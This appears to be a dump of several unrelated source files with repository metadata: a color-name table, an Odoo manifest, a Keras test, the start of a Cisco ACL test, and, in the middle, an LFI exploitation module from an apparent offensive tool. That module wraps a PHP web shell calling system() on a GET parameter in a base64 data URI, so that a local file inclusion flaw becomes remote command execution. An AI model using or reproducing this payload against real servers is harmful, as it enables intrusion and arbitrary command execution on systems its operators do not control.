'lightcyan3': (0.7058823529411765, 0.803921568627451, 0.803921568627451),
'lightcyan4': (0.47843137254901963, 0.5450980392156862, 0.5450980392156862),
'lightgoldenrod': (0.9333333333333333,
0.8666666666666667,
0.5098039215686274),
'lightgoldenrod1': (1.0, 0.9254901960784314, 0.5450980392156862),
'lightgoldenrod2': (0.9333333333333333,
0.8627450980392157,
0.5098039215686274),
'lightgoldenrod3': (0.803921568627451,
0.7450980392156863,
0.4392156862745098),
'lightgoldenrod4': (0.5450980392156862,
0.5058823529411764,
0.2980392156862745),
'lightgoldenrodyellow': (0.9803921568627451,
0.9803921568627451,
0.8235294117647058),
'lightgray': (0.8274509803921568, 0.8274509803921568, 0.8274509803921568),
'lightgreen': (0.5647058823529412, 0.9333333333333333, 0.5647058823529412),
'lightgrey': (0.8274509803921568, 0.8274509803921568, 0.8274509803921568),
'lightpink': (1.0, 0.7137254901960784, 0.7568627450980392),
'lightpink1': (1.0, 0.6823529411764706, 0.7254901960784313),
'lightpink2': (0.9333333333333333, 0.6352941176470588, 0.6784313725490196),
'lightpink3': (0.803921568627451, 0.5490196078431373, 0.5843137254901961),
'lightpink4': (0.5450980392156862, 0.37254901960784315, 0.396078431372549),
'lightsalmon': (1.0, 0.6274509803921569, 0.47843137254901963),
'lightsalmon1': (1.0, 0.6274509803921569, 0.47843137254901963),
'lightsalmon2': (0.9333333333333333, 0.5843137254901961, 0.4470588235294118),
'lightsalmon3': (0.803921568627451, 0.5058823529411764, 0.3843137254901961),
'lightsalmon4': (0.5450980392156862, 0.3411764705882353, 0.25882352941176473),
'lightseagreen': (0.12549019607843137,
0.6980392156862745,
0.6666666666666666),
'lightskyblue': (0.5294117647058824, 0.807843137254902, 0.9803921568627451),
'lightskyblue1': (0.6901960784313725, 0.8862745098039215, 1.0),
'lightskyblue2': (0.6431372549019608, 0.8274509803921568, 0.9333333333333333),
'lightskyblue3': (0.5529411764705883, 0.7137254901960784, 0.803921568627451),
'lightskyblue4': (0.3764705882352941, 0.4823529411764706, 0.5450980392156862),
'lightslateblue': (0.5176470588235295, 0.4392156862745098, 1.0),
'lightslategray': (0.4666666666666667, 0.5333333333333333, 0.6),
'lightslategrey': (0.4666666666666667, 0.5333333333333333, 0.6),
'lightsteelblue': (0.6901960784313725,
0.7686274509803922,
0.8705882352941177),
'lightsteelblue1': (0.792156862745098, 0.8823529411764706, 1.0),
'lightsteelblue2': (0.7372549019607844,
0.8235294117647058,
0.9333333333333333),
'lightsteelblue3': (0.6352941176470588,
0.7098039215686275,
0.803921568627451),
'lightsteelblue4': (0.43137254901960786,
0.4823529411764706,
0.5450980392156862),
'lightyellow': (1.0, 1.0, 0.8784313725490196),
'lightyellow1': (1.0, 1.0, 0.8784313725490196),
'lightyellow2': (0.9333333333333333, 0.9333333333333333, 0.8196078431372549),
'lightyellow3': (0.803921568627451, 0.803921568627451, 0.7058823529411765),
'lightyellow4': (0.5450980392156862, 0.5450980392156862, 0.47843137254901963),
'limegreen': (0.19607843137254902, 0.803921568627451, 0.19607843137254902),
'linen': (0.9803921568627451, 0.9411764705882353, 0.9019607843137255),
'magenta': (1.0, 0.0, 1.0),
'magenta1': (1.0, 0.0, 1.0),
'magenta2': (0.9333333333333333, 0.0, 0.9333333333333333),
'magenta3': (0.803921568627451, 0.0, 0.803921568627451),
'magenta4': (0.5450980392156862, 0.0, 0.5450980392156862),
'maroon': (0.6901960784313725, 0.18823529411764706, 0.3764705882352941),
'maroon1': (1.0, 0.20392156862745098, 0.7019607843137254),
'maroon2': (0.9333333333333333, 0.18823529411764706, 0.6549019607843137),
'maroon3': (0.803921568627451, 0.1607843137254902, 0.5647058823529412),
'maroon4': (0.5450980392156862, 0.10980392156862745, 0.3843137254901961),
'mediumaquamarine': (0.4, 0.803921568627451, 0.6666666666666666),
'mediumblue': (0.0, 0.0, 0.803921568627451),
'mediumorchid': (0.7294117647058823, 0.3333333333333333, 0.8274509803921568),
'mediumorchid1': (0.8784313725490196, 0.4, 1.0),
'mediumorchid2': (0.8196078431372549,
0.37254901960784315,
0.9333333333333333),
'mediumorchid3': (0.7058823529411765, 0.3215686274509804, 0.803921568627451),
'mediumorchid4': (0.47843137254901963,
0.21568627450980393,
0.5450980392156862),
'mediumpurple': (0.5764705882352941, 0.4392156862745098, 0.8588235294117647),
'mediumpurple1': (0.6705882352941176, 0.5098039215686274, 1.0),
'mediumpurple2': (0.6235294117647059, 0.4745098039215686, 0.9333333333333333),
'mediumpurple3': (0.5372549019607843, 0.40784313725490196, 0.803921568627451),
'mediumpurple4': (0.36470588235294116,
0.2784313725490196,
0.5450980392156862),
'mediumseagreen': (0.23529411764705882,
0.7019607843137254,
0.44313725490196076),
'mediumslateblue': (0.4823529411764706,
0.40784313725490196,
0.9333333333333333),
'mediumspringgreen': (0.0, 0.9803921568627451, 0.6039215686274509),
'mediumturquoise': (0.2823529411764706, 0.8196078431372549, 0.8),
'mediumvioletred': (0.7803921568627451,
0.08235294117647059,
0.5215686274509804),
'midnightblue': (0.09803921568627451,
0.09803921568627451,
0.4392156862745098),
'mintcream': (0.9607843137254902, 1.0, 0.9803921568627451),
'mistyrose': (1.0, 0.8941176470588236, 0.8823529411764706),
'mistyrose1': (1.0, 0.8941176470588236, 0.8823529411764706),
'mistyrose2': (0.9333333333333333, 0.8352941176470589, 0.8235294117647058),
'mistyrose3': (0.803921568627451, 0.7176470588235294, 0.7098039215686275),
'mistyrose4': (0.5450980392156862, 0.49019607843137253, 0.4823529411764706),
'moccasin': (1.0, 0.8941176470588236, 0.7098039215686275),
'navajowhite': (1.0, 0.8705882352941177, 0.6784313725490196),
'navajowhite1': (1.0, 0.8705882352941177, 0.6784313725490196),
'navajowhite2': (0.9333333333333333, 0.8117647058823529, 0.6313725490196078),
'navajowhite3': (0.803921568627451, 0.7019607843137254, 0.5450980392156862),
'navajowhite4': (0.5450980392156862, 0.4745098039215686, 0.3686274509803922),
'navy': (0.0, 0.0, 0.5019607843137255),
'navyblue': (0.0, 0.0, 0.5019607843137255),
'oldlace': (0.9921568627450981, 0.9607843137254902, 0.9019607843137255),
'olivedrab': (0.4196078431372549, 0.5568627450980392, 0.13725490196078433),
'olivedrab1': (0.7529411764705882, 1.0, 0.24313725490196078),
'olivedrab2': (0.7019607843137254, 0.9333333333333333, 0.22745098039215686),
'olivedrab3': (0.6039215686274509, 0.803921568627451, 0.19607843137254902),
'olivedrab4': (0.4117647058823529, 0.5450980392156862, 0.13333333333333333),
'orange': (1.0, 0.6470588235294118, 0.0),
'orange1': (1.0, 0.6470588235294118, 0.0),
'orange2': (0.9333333333333333, 0.6039215686274509, 0.0),
'orange3': (0.803921568627451, 0.5215686274509804, 0.0),
'orange4': (0.5450980392156862, 0.35294117647058826, 0.0),
'orangered': (1.0, 0.27058823529411763, 0.0),
'orangered1': (1.0, 0.27058823529411763, 0.0),
'orangered2': (0.9333333333333333, 0.25098039215686274, 0.0),
'orangered3': (0.803921568627451, 0.21568627450980393, 0.0),
'orangered4': (0.5450980392156862, 0.1450980392156863, 0.0),
'orchid': (0.8549019607843137, 0.4392156862745098, 0.8392156862745098),
'orchid1': (1.0, 0.5137254901960784, 0.9803921568627451),
'orchid2': (0.9333333333333333, 0.47843137254901963, 0.9137254901960784),
'orchid3': (0.803921568627451, 0.4117647058823529, 0.788235294117647),
'orchid4': (0.5450980392156862, 0.2784313725490196, 0.5372549019607843),
'palegoldenrod': (0.9333333333333333, 0.9098039215686274, 0.6666666666666666),
'palegreen': (0.596078431372549, 0.984313725490196, 0.596078431372549),
'palegreen1': (0.6039215686274509, 1.0, 0.6039215686274509),
'palegreen2': (0.5647058823529412, 0.9333333333333333, 0.5647058823529412),
'palegreen3': (0.48627450980392156, 0.803921568627451, 0.48627450980392156),
'palegreen4': (0.32941176470588235, 0.5450980392156862, 0.32941176470588235),
'paleturquoise': (0.6862745098039216, 0.9333333333333333, 0.9333333333333333),
'paleturquoise1': (0.7333333333333333, 1.0, 1.0),
'paleturquoise2': (0.6823529411764706,
0.9333333333333333,
0.9333333333333333),
'paleturquoise3': (0.5882352941176471, 0.803921568627451, 0.803921568627451),
'paleturquoise4': (0.4, 0.5450980392156862, 0.5450980392156862),
'palevioletred': (0.8588235294117647, 0.4392156862745098, 0.5764705882352941),
'palevioletred1': (1.0, 0.5098039215686274, 0.6705882352941176),
'palevioletred2': (0.9333333333333333,
0.4745098039215686,
0.6235294117647059),
'palevioletred3': (0.803921568627451,
0.40784313725490196,
0.5372549019607843),
'palevioletred4': (0.5450980392156862,
0.2784313725490196,
0.36470588235294116),
'papayawhip': (1.0, 0.9372549019607843, 0.8352941176470589),
'peachpuff': (1.0, 0.8549019607843137, 0.7254901960784313),
'peachpuff1': (1.0, 0.8549019607843137, 0.7254901960784313),
'peachpuff2': (0.9333333333333333, 0.796078431372549, 0.6784313725490196),
'peachpuff3': (0.803921568627451, 0.6862745098039216, 0.5843137254901961),
'peachpuff4': (0.5450980392156862, 0.4666666666666667, 0.396078431372549),
'peru': (0.803921568627451, 0.5215686274509804, 0.24705882352941178),
'pink': (1.0, 0.7529411764705882, 0.796078431372549),
'pink1': (1.0, 0.7098039215686275, 0.7725490196078432),
'pink2': (0.9333333333333333, 0.6627450980392157, 0.7215686274509804),
'pink3': (0.803921568627451, 0.5686274509803921, 0.6196078431372549),
'pink4': (0.5450980392156862, 0.38823529411764707, 0.4235294117647059),
'plum': (0.8666666666666667, 0.6274509803921569, 0.8666666666666667),
'plum1': (1.0, 0.7333333333333333, 1.0),
'plum2': (0.9333333333333333, 0.6823529411764706, 0.9333333333333333),
'plum3': (0.803921568627451, 0.5882352941176471, 0.803921568627451),
'plum4': (0.5450980392156862, 0.4, 0.5450980392156862),
'powderblue': (0.6901960784313725, 0.8784313725490196, 0.9019607843137255),
'purple': (0.6274509803921569, 0.12549019607843137, 0.9411764705882353),
'purple1': (0.6078431372549019, 0.18823529411764706, 1.0),
'purple2': (0.5686274509803921, 0.17254901960784313, 0.9333333333333333),
'purple3': (0.49019607843137253, 0.14901960784313725, 0.803921568627451),
'purple4': (0.3333333333333333, 0.10196078431372549, 0.5450980392156862),
'red': (1.0, 0.0, 0.0),
'red1': (1.0, 0.0, 0.0),
'red2': (0.9333333333333333, 0.0, 0.0),
'red3': (0.803921568627451, 0.0, 0.0),
'red4': (0.5450980392156862, 0.0, 0.0),
'rosybrown': (0.7372549019607844, 0.5607843137254902, 0.5607843137254902),
'rosybrown1': (1.0, 0.7568627450980392, 0.7568627450980392),
'rosybrown2': (0.9333333333333333, 0.7058823529411765, 0.7058823529411765),
'rosybrown3': (0.803921568627451, 0.6078431372549019, 0.6078431372549019),
'rosybrown4': (0.5450980392156862, 0.4117647058823529, 0.4117647058823529),
'royalblue': (0.2549019607843137, 0.4117647058823529, 0.8823529411764706),
'royalblue1': (0.2823529411764706, 0.4627450980392157, 1.0),
'royalblue2': (0.2627450980392157, 0.43137254901960786, 0.9333333333333333),
'royalblue3': (0.22745098039215686, 0.37254901960784315, 0.803921568627451),
'royalblue4': (0.15294117647058825, 0.25098039215686274, 0.5450980392156862),
'saddlebrown': (0.5450980392156862, 0.27058823529411763, 0.07450980392156863),
'salmon': (0.9803921568627451, 0.5019607843137255, 0.4470588235294118),
'salmon1': (1.0, 0.5490196078431373, 0.4117647058823529),
'salmon2': (0.9333333333333333, 0.5098039215686274, 0.3843137254901961),
'salmon3': (0.803921568627451, 0.4392156862745098, 0.32941176470588235),
'salmon4': (0.5450980392156862, 0.2980392156862745, 0.2235294117647059),
'sandybrown': (0.9568627450980393, 0.6431372549019608, 0.3764705882352941),
'seagreen': (0.1803921568627451, 0.5450980392156862, 0.3411764705882353),
'seagreen1': (0.32941176470588235, 1.0, 0.6235294117647059),
'seagreen2': (0.3058823529411765, 0.9333333333333333, 0.5803921568627451),
'seagreen3': (0.2627450980392157, 0.803921568627451, 0.5019607843137255),
'seagreen4': (0.1803921568627451, 0.5450980392156862, 0.3411764705882353),
'seashell': (1.0, 0.9607843137254902, 0.9333333333333333),
'seashell1': (1.0, 0.9607843137254902, 0.9333333333333333),
'seashell2': (0.9333333333333333, 0.8980392156862745, 0.8705882352941177),
'seashell3': (0.803921568627451, 0.7725490196078432, 0.7490196078431373),
'seashell4': (0.5450980392156862, 0.5254901960784314, 0.5098039215686274),
'sienna': (0.6274509803921569, 0.3215686274509804, 0.17647058823529413),
'sienna1': (1.0, 0.5098039215686274, 0.2784313725490196),
'sienna2': (0.9333333333333333, 0.4745098039215686, 0.25882352941176473),
'sienna3': (0.803921568627451, 0.40784313725490196, 0.2235294117647059),
'sienna4': (0.5450980392156862, 0.2784313725490196, 0.14901960784313725),
'skyblue': (0.5294117647058824, 0.807843137254902, 0.9215686274509803),
'skyblue1': (0.5294117647058824, 0.807843137254902, 1.0),
'skyblue2': (0.49411764705882355, 0.7529411764705882, 0.9333333333333333),
'skyblue3': (0.4235294117647059, 0.6509803921568628, 0.803921568627451),
'skyblue4': (0.2901960784313726, 0.4392156862745098, 0.5450980392156862),
'slateblue': (0.41568627450980394, 0.35294117647058826, 0.803921568627451),
'slateblue1': (0.5137254901960784, 0.43529411764705883, 1.0),
'slateblue2': (0.47843137254901963, 0.403921568627451, 0.9333333333333333),
'slateblue3': (0.4117647058823529, 0.34901960784313724, 0.803921568627451),
'slateblue4': (0.2784313725490196, 0.23529411764705882, 0.5450980392156862),
'slategray': (0.4392156862745098, 0.5019607843137255, 0.5647058823529412),
'slategray1': (0.7764705882352941, 0.8862745098039215, 1.0),
'slategray2': (0.7254901960784313, 0.8274509803921568, 0.9333333333333333),
'slategray3': (0.6235294117647059, 0.7137254901960784, 0.803921568627451),
'slategray4': (0.4235294117647059, 0.4823529411764706, 0.5450980392156862),
'slategrey': (0.4392156862745098, 0.5019607843137255, 0.5647058823529412),
'snow': (1.0, 0.9803921568627451, 0.9803921568627451),
'snow1': (1.0, 0.9803921568627451, 0.9803921568627451),
'snow2': (0.9333333333333333, 0.9137254901960784, 0.9137254901960784),
'snow3': (0.803921568627451, 0.788235294117647, 0.788235294117647),
'snow4': (0.5450980392156862, 0.5372549019607843, 0.5372549019607843),
'springgreen': (0.0, 1.0, 0.4980392156862745),
'springgreen1': (0.0, 1.0, 0.4980392156862745),
'springgreen2': (0.0, 0.9333333333333333, 0.4627450980392157),
'springgreen3': (0.0, 0.803921568627451, 0.4),
'springgreen4': (0.0, 0.5450980392156862, 0.27058823529411763),
'steelblue': (0.27450980392156865, 0.5098039215686274, 0.7058823529411765),
'steelblue1': (0.38823529411764707, 0.7215686274509804, 1.0),
'steelblue2': (0.3607843137254902, 0.6745098039215687, 0.9333333333333333),
'steelblue3': (0.30980392156862746, 0.5803921568627451, 0.803921568627451),
'steelblue4': (0.21176470588235294, 0.39215686274509803, 0.5450980392156862),
'tan': (0.8235294117647058, 0.7058823529411765, 0.5490196078431373),
'tan1': (1.0, 0.6470588235294118, 0.30980392156862746),
'tan2': (0.9333333333333333, 0.6039215686274509, 0.28627450980392155),
'tan3': (0.803921568627451, 0.5215686274509804, 0.24705882352941178),
'tan4': (0.5450980392156862, 0.35294117647058826, 0.16862745098039217),
'thistle': (0.8470588235294118, 0.7490196078431373, 0.8470588235294118),
'thistle1': (1.0, 0.8823529411764706, 1.0),
'thistle2': (0.9333333333333333, 0.8235294117647058, 0.9333333333333333),
'thistle3': (0.803921568627451, 0.7098039215686275, 0.803921568627451),
'thistle4': (0.5450980392156862, 0.4823529411764706, 0.5450980392156862),
'tomato': (1.0, 0.38823529411764707, 0.2784313725490196),
'tomato1': (1.0, 0.38823529411764707, 0.2784313725490196),
'tomato2': (0.9333333333333333, 0.3607843137254902, 0.25882352941176473),
'tomato3': (0.803921568627451, 0.30980392156862746, 0.2235294117647059),
'tomato4': (0.5450980392156862, 0.21176470588235294, 0.14901960784313725),
'turquoise': (0.25098039215686274, 0.8784313725490196, 0.8156862745098039),
'turquoise1': (0.0, 0.9607843137254902, 1.0),
'turquoise2': (0.0, 0.8980392156862745, 0.9333333333333333),
'turquoise3': (0.0, 0.7725490196078432, 0.803921568627451),
'turquoise4': (0.0, 0.5254901960784314, 0.5450980392156862),
'violet': (0.9333333333333333, 0.5098039215686274, 0.9333333333333333),
'violetred': (0.8156862745098039, 0.12549019607843137, 0.5647058823529412),
'violetred1': (1.0, 0.24313725490196078, 0.5882352941176471),
'violetred2': (0.9333333333333333, 0.22745098039215686, 0.5490196078431373),
'violetred3': (0.803921568627451, 0.19607843137254902, 0.47058823529411764),
'violetred4': (0.5450980392156862, 0.13333333333333333, 0.3215686274509804),
'wheat': (0.9607843137254902, 0.8705882352941177, 0.7019607843137254),
'wheat1': (1.0, 0.9058823529411765, 0.7294117647058823),
'wheat2': (0.9333333333333333, 0.8470588235294118, 0.6823529411764706),
'wheat3': (0.803921568627451, 0.7294117647058823, 0.5882352941176471),
'wheat4': (0.5450980392156862, 0.49411764705882355, 0.4),
'white': (1.0, 1.0, 1.0),
'whitesmoke': (0.9607843137254902, 0.9607843137254902, 0.9607843137254902),
'yellow': (1.0, 1.0, 0.0),
'yellow1': (1.0, 1.0, 0.0),
'yellow2': (0.9333333333333333, 0.9333333333333333, 0.0),
'yellow3': (0.803921568627451, 0.803921568627451, 0.0),
'yellow4': (0.5450980392156862, 0.5450980392156862, 0.0),
'yellowgreen': (0.6039215686274509, 0.803921568627451, 0.19607843137254902),
}
color_list = []
def recalc_color_list():
global color_list
color_list = list(color_dict.keys())
color_list.sort()
def lookup_color(name, format='tuple'):
color = color_dict[name]
if format == 'tuple':
return color
elif format == 'hash':
return "#%02x%02x%02x" % (
int(color[0]*255), int(color[1]*255), int(color[2]*255))
else:
raise ValueError("format needs to be 'tuple' or 'hash'")
def add_color(name, tup):
global color_dict
color_dict[name] = tup
recalc_color_list()
def remove_color(name):
global color_dict
del color_dict[name]
recalc_color_list()
def get_colors():
return color_list
def scan_rgbtxt(filepath):
with open(filepath, 'r') as in_f:
buf = in_f.read()
res = {}
for line in buf.split('\n'):
match = re.match(r"^\s*(\d+)\s+(\d+)\s+(\d+)\s+([\w_]+)\s*$", line)
if match:
r, g, b, name = match.groups()
r = float(r) / 255.0
g = float(g) / 255.0
b = float(b) / 255.0
name = name.lower()
res[name] = (r, g, b)
return res
# create initial color list
recalc_color_list()
if __name__ == "__main__":
import sys, pprint
res = scan_rgbtxt(sys.argv[1])
pprint.pprint(res)
#END
|
eteq/ginga
|
ginga/colors.py
|
Python
|
bsd-3-clause
| 48,361 | 0.000186 |
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Base Module',
'summary': 'Base Module used by MostlyOpen Solutions.',
'version': '2.0.0',
'author': 'Carlos Eduardo Vercelino - CLVsol',
'category': 'Generic Modules/Others',
'license': 'AGPL-3',
'website': 'http://mostlyopen.org',
'depends': ['base'],
'data': [
'security/base_security.xml',
'views/base_menu_view.xml',
'views/groupings_menu_view.xml',
'views/agro_menu_view.xml',
'views/community_menu_view.xml',
'views/health_menu_view.xml',
'views/insurance_menu_view.xml',
'views/pharmacy_menu_view.xml',
'views/mfmng_menu_view.xml',
'views/res_users_view.xml',
],
'demo': [],
'test': [],
'init_xml': [],
'test': [],
'update_xml': [],
'installable': True,
'application': False,
'active': False,
'css': [],
}
|
MostlyOpen/odoo_addons
|
myo_base/__openerp__.py
|
Python
|
agpl-3.0
| 1,788 | 0 |
from core.techniques.LFIExec import LFIExec
from base64 import b64encode
class LFIDataURI (LFIExec):
files_exec = [
# input
{ 'path' : '', 'type' : 'data_uri' },
]
# find LFI code execution path
def check (self):
return super(LFIDataURI, self)._check (prepare_check_data_uri)
# do exec
def exploit (self, cmd):
return super(LFIDataURI, self)._exploit (prepare_exec_data_uri, cmd)
def prepare_check_data_uri (lfi, payload):
purl = lfi.pattern_url[:]
payload = 'data:text/plain;base64,' + b64encode (payload)
# payload = 'data:text/plain,' + payload
url = purl.replace (lfi.payload_placeholder, payload)
return url
def prepare_exec_data_uri (lfi, cmd):
purl = lfi.pattern_url[:]
payload_exec = '<?php echo "' + lfi.tag_start_exec + '"; system ($_GET["cmd"]); echo "' + lfi.tag_end_exec + '"; ?>'
payload = 'data:text/plain;base64,{0}&cmd={1}'.format (b64encode (payload_exec), cmd)
# payload = 'data:text/plain,{0}&cmd={1}'.format (payload_exec, cmd)
url = purl.replace (lfi.payload_placeholder, payload)
return url
|
m101/lfipwn
|
core/techniques/LFIDataURI.py
|
Python
|
agpl-3.0
| 1,128 | 0.018617 |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests specific to deferred-build `Sequential` models."""
import os
import unittest
import numpy as np
from tensorflow.python import keras
from tensorflow.python.compat import v2_compat
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestDeferredSequential(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_build_behavior(self):
# Test graph network creation after __call__
model = get_model()
model(np.random.random((2, 6)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [2, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [2, 2])
# Test effect of new __call__ with a different shape
model(np.random.random((3, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
model(np.random.random((4, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after build
model = get_model()
model.build((None, 6))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after compile/fit
model = get_model()
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy()],
run_eagerly=testing_utils.should_run_eagerly())
model.fit(np.zeros((2, 6)), np.zeros((2, 2)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
# Inconsistency here: with eager `fit`, the model is built with shape
# (2, 6), but with graph function `fit`, it is built with shape `(None, 6)`.
# This is likely due to our assumption "the batch size should be dynamic"
# at the level of `Model`. TODO(fchollet): investigate and resolve.
self.assertEqual(model.inputs[0].shape.as_list()[-1], 6)
self.assertEqual(model.outputs[0].shape.as_list()[-1], 2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_add_and_pop(self):
model = get_model()
model.build((None, 6))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
model.pop()
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 2)
self.assertLen(model.weights, 2)
model.add(keras.layers.Dense(2))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_feature_extraction(self):
# This tests layer connectivity reset when rebuilding
model = get_model()
model(np.random.random((3, 6))) # First build
model(np.random.random((4, 6))) # Triggers a rebuild
# Classic feature extractor pattern
extractor = keras.Model(inputs=model.inputs,
outputs=[layer.output for layer in model.layers])
# Check that inputs and outputs are connected
_ = extractor(np.random.random((4, 6)))
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_savedmodel(self):
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@unittest.skipIf(h5py is None, 'Test requires h5py')
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_h5(self):
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@keras_parameterized.run_all_keras_modes
def test_shared_layer(self):
# This tests that preexisting layer connectivity is preserved
# when auto-building graph networks
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m1(np.random.random((3, 6)))
m2 = keras.Sequential([shared_layer])
m2(np.random.random((3, 6)))
# Nesting case
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m2 = keras.Sequential([shared_layer, m1])
m2(np.random.random((3, 2)))
@keras_parameterized.run_all_keras_modes
def test_loss_layer(self):
class LossLayer(keras.layers.Layer):
def call(self, inputs):
self.add_loss(math_ops.reduce_sum(inputs))
return inputs
# Test loss layer alone
model = keras.Sequential([LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertAllClose(loss, 2.)
# Test loss layer combined with another layer
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertLess(loss, 2.)
# Test loss layer combined with external loss
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', 'mse',
run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)), np.ones((2, 2)))
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)), np.ones((1, 2)))
def get_model():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, name='first_layer'))
model.add(keras.layers.Dropout(0.3, name='dp'))
model.add(keras.layers.Dense(2, name='last_layer'))
return model
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
frreiss/tensorflow-fred
|
tensorflow/python/keras/engine/deferred_sequential_test.py
|
Python
|
apache-2.0
| 8,563 | 0.003503 |
# Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittest for cisco acl rendering module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import re
import unittest
from lib import aclgenerator
from lib import cisco
from lib import nacaddr
from lib import naming
from lib import policy
import mock
GOOD_HEADER = """
header {
comment:: "this is a test acl"
target:: cisco test-filter
}
"""
GOOD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 99 standard
}
"""
GOOD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco FOO standard
}
"""
GOOD_STANDARD_NUMBERED_HEADER = """
header {
comment:: "numbered standard"
target:: cisco 50 standard
}
"""
GOOD_OBJGRP_HEADER = """
header {
comment:: "obj group header test"
target:: cisco objgroupheader object-group
}
"""
GOOD_INET6_HEADER = """
header {
comment:: "inet6 header test"
target:: cisco inet6_acl inet6
}
"""
GOOD_MIXED_HEADER = """
header {
comment:: "mixed inet/inet6 header test"
target:: cisco mixed_acl mixed
}
"""
GOOD_DSMO_HEADER = """
header {
comment:: "this is a dsmo test acl"
target:: cisco dsmo_acl extended enable_dsmo
}
"""
GOOD_EXTENDED_NUMBERED_HEADER = """
header {
comment:: "numbered extended"
target:: cisco 150 extended
}
"""
